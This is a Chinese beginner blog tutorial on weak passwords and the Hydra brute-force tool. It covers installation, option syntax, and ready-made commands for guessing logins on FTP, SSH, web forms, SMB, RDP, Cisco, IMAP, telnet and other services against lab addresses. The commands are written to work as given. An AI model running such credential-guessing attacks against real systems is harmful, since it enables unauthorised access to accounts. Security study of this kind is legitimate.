美文网首页网络安全实验室从0到1玩转网络安全Kali Linux
从0到1学习网络安全 【Web安全入门篇-弱口令与Hydra】

从0到1学习网络安全 【Web安全入门篇-弱口令与Hydra】

作者: _07 | 来源:发表于2018-05-18 18:37 被阅读37次

    前言

    额...经过一个月的修炼我又回来了,接下来咱们将以OWASP Top 10 为标准来学习Web安全中常见的十大漏洞。

    话不多说,今天咱们一起来学习 弱口令及爆破工具 Hydra


    一、弱口令

    在全世界范围来看,安全漏洞中排名第一的既不是系统补丁缺失,也不是网站存在跨站、注入等风险,而是密码问题。一套完整的安全防御体系,很有可能因为使用弱口令而功亏一篑。弱口令即过于简单、容易被试出或猜到的密码,下面是国内常用的一些弱密码组合:


    image.png

    口令攻击:即对某个服务或某个接口多次尝试不同的账号密码组合,以获得目标的相应权限。这样来看,尝试的密码组合越多,则匹配上的成功性越高,为了提高效率,则需要一款自动化工具来高效执行。


    二、Hydra

    • 简介

    Hydra就是这样一款弱口令扫描工具,它运行于linux系统环境中,可扫描MySQL、FTP、SSH、SMB、telnet、SNMP等几十种类型的弱口令,并具有很多优点。比如扫描速度较快,稳定性很好,命令行下易于控制对目标主机的压力,软件有后续的更新维护等。

    • 安装

    以Cent OS 6.5 为例
    Step1: 安装工具依赖包

    语法:

    [root@localhost ~]# yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
    
    • 如图:


      image.png

    Step2:编译安装

    语法

    [root@localhost ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz ##将压缩包下载到本地
    [root@localhost ~]# tar zxvf hydra-7.4.1.tar.gz
    [root@localhost ~]# cd hydra-7.4.1
    [root@localhost hydra-7.4.1]# ./configure 
    ##编译&&安装
    [root@localhost hydra-7.4.1]# make
    [root@localhost hydra-7.4.1]# make install
    
    • ./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

    三、Hydra 语法

    hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]   server service [OPT]
    

    详细解释:

    • -R
      继续从上一次进度接着破解

    • -S
      大写,采用SSL链接

    • -s<PORT>
      小写,可通过这个参数指定非默认端口

    • -l<LOGIN>
      小写,指定破解的用户,对特定用户破解

    • -L<FILE>
      大写,指定用户名字典

    • -p<PASS>
      小写,指定密码破解,少用,一般是采用密码字典

    • -P<FILE>
      大写,指定密码字典

    • -e<ns>
      可选选项,n:空密码试探,s:使用指定用户和密码试探

    • -C<FILE>
      使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

    • -M<FILE>
      指定目标列表文件一行一条

    • -o<FILE>
      指定结果输出文件

    • -f
      在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

    • -t<TASKS>
      同时运行的线程数,默认为16

    • -w<TIME>
      设置最大超时的时间,单位秒,默认是30s

    • -v /-V
      显示详细过程

    • server
      目标ip

    • service
      指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm]imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy ciscocisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd firebird ncp afp等等

    • OPT 可选项


    四、实例

    1. 手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。


      image.png
    1. 破解FTP

    语法:

    root@kali:~# hydra -L users.txt -P pass.txt -t 1 -vV 192.168.43.33 ftp 
    ##hydra  -L 用户名字典  -P 密码字典  -t 线程  -vV 详细过程  ip  ftp
    ##hydra  -L 用户名字典  -P 密码字典  -e ns    -vV 详细过程  ip  ftp
    
    • 如图:


      image.png
    1. 破解SSH

    语法:

    # hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.43.33 ssh
    
    #可以使用 -o 选项指定结果输出文件
    # hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.43.33 ssh
    
    1. get方式提交,破解web登录

    语法:

    # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
    # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
    
    1. post方式提交,破解web登录

    语法:

    # hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
    # hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 192.168.43.33目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
    
    1. 破解https:

    语法:

    # hydra -m /index.php -l admin -P pass.txt 192.168.43.33 https
    
    1. 破解teamspeak:

    语法:

    # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
    
    1. 破解cisco:

    语法:

    # hydra -P pass.txt 192.168.43.33 cisco
    # hydra -m cloud -P pass.txt 192.168.43.33 cisco-enable
    
    1. 破解smb:

    语法:

    # hydra -l administrator -P pass.txt 192.168.43.33 smb
    
    1. 破解pop3:

    语法:

    # hydra -l admin -P pass.txt my.pop3.mail pop3
    
    1. 破解rdp:

    语法:

    # hydra ip rdp -l administrator -P pass.txt -V
    
    1. 破解http-proxy:

    语法:

    # hydra -l admin -P pass.txt http-proxy://192.168.43.33
    
    1. 破解imap:

    语法:

    # hydra -L user.txt -p secret 192.168.43.33 imap PLAIN
    # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    
    1. 破解telnet

    语法:

    # hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
    


    小编也在学习,写的不好见谅。
    从0到1学习网络安全 【目录】

    小编最近建了交流群方便大家交流学习,群内有小编平时整理的学习资料、视频、工具等。
    白帽交流群 【简介】
    感谢大家支持。

    相关文章

      网友评论

        本文标题:从0到1学习网络安全 【Web安全入门篇-弱口令与Hydra】

        本文链接:https://www.haomeiwen.com/subject/itygdftx.html